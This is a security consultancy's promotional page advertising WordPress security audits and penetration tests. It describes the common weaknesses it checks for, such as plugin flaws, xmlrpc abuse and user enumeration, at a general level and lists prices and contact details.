WordPress core is reasonably secure and receives regular security updates. However, the vast majority of WordPress compromises come from vulnerable plugins, outdated themes, weak admin credentials and server misconfigurations rather than core vulnerabilities. With over 60,000 plugins in the ecosystem, most WordPress sites run at least one plugin with known security issues. Sherlock Forensics audits your entire WordPress installation including every plugin, theme and server configuration.

How do I find WordPress vulnerabilities?

Start with a professional security audit that checks your WordPress version, all installed plugins and themes against known vulnerability databases, tests for user enumeration, checks xmlrpc accessibility, verifies wp-config protection and tests login security. Sherlock Forensics provides comprehensive WordPress security audits from $1,500 CAD. You can also try our free scanner at sherlockforensics.com/pages/hack-your-own-website.html which automatically detects WordPress sites and checks for user enumeration.

Are WordPress plugins safe?

WordPress plugins vary dramatically in security quality. Popular plugins from reputable developers receive regular security updates, but many plugins are abandoned, poorly coded or intentionally malicious. Even well-maintained plugins have had critical vulnerabilities including SQL injection, cross-site scripting and remote code execution. Every plugin you install expands your attack surface. Sherlock Forensics audits every plugin on your site against vulnerability databases and tests for exploitable flaws.

Should I disable xmlrpc.php?

Yes, unless you specifically need it for Jetpack, the WordPress mobile app or XML-RPC based publishing tools. xmlrpc.php enables brute force password attacks that bypass wp-login rate limiting, DDoS amplification through pingback abuse and credential discovery. Disable it through your web server configuration, a security plugin or by blocking access in .htaccess. Sherlock Forensics tests xmlrpc accessibility and exploitation potential as part of every WordPress audit.

How much does a WordPress security audit cost?

Sherlock Forensics offers WordPress security audits starting at $1,500 CAD for a quick audit covering plugin vulnerabilities, core version assessment, user enumeration, login security and common misconfigurations. Standard penetration tests for larger WordPress sites with custom development start at $5,000 CAD. Comprehensive assessments including server configuration review and source code analysis start at $12,000 CAD.

WordPress Security

WordPress Security Audit

40% of the web runs WordPress. Attackers know this.

Sherlock Forensics provides WordPress security audits covering plugin vulnerabilities, outdated core and themes, xmlrpc abuse, user enumeration via REST API (/wp-json/wp/v2/users), wp-config exposure, brute force on wp-login, directory listing on wp-content and file upload vulnerabilities. Quick audits from $1,500 CAD. Standard penetration tests from $5,000 CAD.

WordPress powers over 40% of all websites on the internet, making it the single most targeted platform by attackers. Automated bots scan for WordPress installations 24 hours a day, testing for vulnerable plugins, exposed configuration files, default admin credentials and xmlrpc abuse. The plugin ecosystem is both WordPress's greatest strength and its greatest weakness. Every plugin is a potential entry point, and most WordPress sites run dozens of them. We audit WordPress installations to find the vulnerabilities that automated scanners and security plugins miss.

Order a Quick Audit - $1,500 Scope a Full Pentest

What We Find

WordPress Vulnerabilities We Test For

01 - Plugins

Plugin Vulnerabilities

WordPress plugins are the most common entry point for site compromises. With over 60,000 plugins available, quality and security practices vary enormously. Popular plugins have had critical SQL injection, remote code execution, arbitrary file upload and authentication bypass vulnerabilities. Abandoned plugins never receive patches. We audit every plugin on your site against multiple vulnerability databases, test for known exploits, identify abandoned or end-of-life plugins and assess the attack surface each plugin introduces to your installation.

02 - Core

Outdated Core and Themes

Running an outdated WordPress core version or outdated themes exposes your site to every vulnerability patched since your last update. WordPress security updates frequently patch critical vulnerabilities including SQL injection, stored XSS, privilege escalation and remote code execution. Themes with vulnerable PHP files, outdated JavaScript libraries and unpatched template injection flaws compound the risk. We identify your exact WordPress version, compare it against known vulnerabilities and test for exploitable issues in every installed theme.

03 - XMLRPC

xmlrpc Abuse

WordPress's xmlrpc.php endpoint enables remote publishing, pingbacks and the mobile app. Attackers abuse it for brute force password attacks using the system.multicall method that tests hundreds of credentials in a single HTTP request, bypassing wp-login rate limiting and lockout plugins. It also enables DDoS amplification through pingback abuse and can leak internal network information. We test xmlrpc accessibility, attempt credential brute forcing through multicall and assess pingback abuse potential.

04 - Users

User Enumeration via REST API

WordPress's REST API at /wp-json/wp/v2/users exposes usernames by default, giving attackers valid login names for brute force attacks. Combined with author archive scanning (?author=1, ?author=2) and login error messages that confirm whether a username exists, attackers can enumerate every user account on your site without authentication. Our scanner automatically detects WordPress and checks for user enumeration. We test all enumeration vectors and verify that user information is properly restricted.

05 - Config

wp-config Exposure

wp-config.php contains your database credentials, authentication keys, salts, table prefix and debug settings. When the web server is misconfigured, PHP processing fails or backup files exist (wp-config.php.bak, wp-config.old), these credentials become directly accessible. Exposed database credentials allow direct database access if the database server is reachable. Exposed authentication keys allow session forgery and cookie manipulation. We test for wp-config accessibility through multiple vectors including direct requests, backup extensions and server misconfiguration.

06 - Brute

Brute Force on wp-login

The wp-login.php page is the most attacked endpoint on the internet. Automated bots attempt thousands of username and password combinations daily against every WordPress site they find. Without rate limiting, account lockout, CAPTCHA or IP blocking, these attacks eventually succeed against weak passwords. We test your login security including rate limiting effectiveness, account lockout thresholds, CAPTCHA implementation, two-factor authentication and whether the login page reveals valid usernames through error messages.

07 - Directory

Directory Listing on wp-content

When directory listing is enabled on wp-content, wp-content/uploads, wp-content/plugins and wp-content/themes, attackers can browse your entire file structure. This reveals installed plugin names and versions for vulnerability matching, uploaded file paths, backup files, configuration files and any sensitive documents stored in the uploads directory. We test directory listing across all WordPress directories and check for sensitive files that should not be publicly accessible.

08 - Upload

File Upload Vulnerabilities

WordPress and its plugins handle file uploads for media, forms, imports and backups. Vulnerable upload handling allows attackers to upload PHP shells that provide full server control, bypass file type restrictions through extension manipulation, overwrite existing files through path traversal and store malicious files that get executed by the web server. We test every file upload mechanism on your site for extension bypass, MIME type spoofing, size limits, path traversal and execution of uploaded files.

Our Approach

How We Audit WordPress Sites

Plugin and Theme Inventory

We enumerate every installed plugin and theme including active and inactive installations. We check each one against multiple vulnerability databases, identify version numbers, flag abandoned or end-of-life components and assess the attack surface each adds to your site. Inactive plugins that remain on the server are still exploitable and frequently overlooked.

Configuration and Hardening Review

We review your WordPress configuration including wp-config.php settings, file permissions, directory listing, web server configuration, PHP settings, SSL/TLS implementation and security headers. We verify that debug mode is disabled, that configuration files are inaccessible and that your hosting environment follows WordPress hardening best practices.

Authentication and Access Control

We test login security, user enumeration vectors, xmlrpc brute force potential, REST API exposure, role-based access control, admin panel protection and session management. We verify that administrator accounts use strong credentials, that login rate limiting is effective and that user enumeration is blocked across all vectors including the REST API and author archives.

Malware and Backdoor Scanning

We scan your WordPress installation for existing compromises including injected PHP backdoors, modified core files, malicious plugins, SEO spam injection, redirect chains and hidden admin accounts. Many WordPress sites are already compromised without the owner knowing. We identify active infections and the entry points attackers used to gain access.

Pricing

WordPress Security Engagements

Quick Audit - $1,500 CAD: Focused security review covering plugin vulnerability assessment, core version check, user enumeration, xmlrpc testing, wp-config exposure, login security and common misconfigurations. Ideal for business websites and blogs. Delivered in 3-5 business days. Order online.
Standard Penetration Test - $5,000 CAD: Full penetration test covering all plugins, themes, custom code, REST API, file uploads, server configuration and malware scanning. For WordPress sites with e-commerce, membership areas or custom plugin development. Order online.
Comprehensive Assessment - $12,000 CAD: Full-scope assessment including source code review of custom plugins and themes, server infrastructure testing, hosting configuration audit, malware forensics and ongoing monitoring recommendations. For enterprise WordPress deployments. Contact us to scope.

Frequently Asked Questions

WordPress Security FAQs

Is WordPress secure?: WordPress core is maintained by a dedicated security team and receives regular updates. However, the vast majority of WordPress compromises come from vulnerable plugins, outdated themes, weak credentials and server misconfigurations. The plugin ecosystem introduces enormous attack surface that WordPress core cannot control. Most WordPress sites we audit have at least one critical vulnerability, usually in a plugin.
How do I find WordPress vulnerabilities?: A professional WordPress security audit checks your core version, every plugin and theme against vulnerability databases, tests login security, checks xmlrpc exposure, verifies wp-config protection and scans for existing compromises. You can start with our free scanner at sherlockforensics.com/pages/hack-your-own-website.html which automatically detects WordPress sites and checks for user enumeration. For a thorough assessment, our quick audits start at $1,500 CAD.
Are WordPress plugins safe?: Plugin security varies enormously. Well-maintained plugins from established developers receive regular security updates, but many plugins are abandoned, poorly coded or have never had a security review. Even popular plugins with millions of installations have had critical vulnerabilities. Only install plugins you actually need, choose plugins with active maintenance, check vulnerability databases before installing and remove plugins you no longer use.
Should I disable xmlrpc.php?: Yes, unless you specifically need it for Jetpack, the WordPress mobile app or XML-RPC publishing. xmlrpc.php enables brute force attacks that bypass login page protections, DDoS amplification through pingback abuse and credential testing via system.multicall. Block access through your web server configuration or .htaccess. Security plugins that only disable pingbacks leave the brute force vector open.
How much does a WordPress security audit cost?: Sherlock Forensics offers WordPress security audits starting at $1,500 CAD for a quick audit covering plugin assessment, core security, login hardening and common misconfigurations. Standard penetration tests for larger WordPress sites with custom development start at $5,000 CAD. Comprehensive assessments with source code review and infrastructure testing start at $12,000 CAD. All engagements include a detailed report with prioritized remediation guidance.

Get Started

Find out what attackers already know about your WordPress site.

Quick audits from $1,500 CAD. Standard penetration tests from $5,000 CAD.

Order Online

Secure Your WordPress Site

Tell us about your WordPress installation, how many plugins you run and your biggest security concerns. We will recommend the right assessment for your site.

Call 604.229.1994

Phone: 604.229.1994
Burnaby Office: Burnaby, BC, Canada
Coquitlam Office: Coquitlam, BC, Canada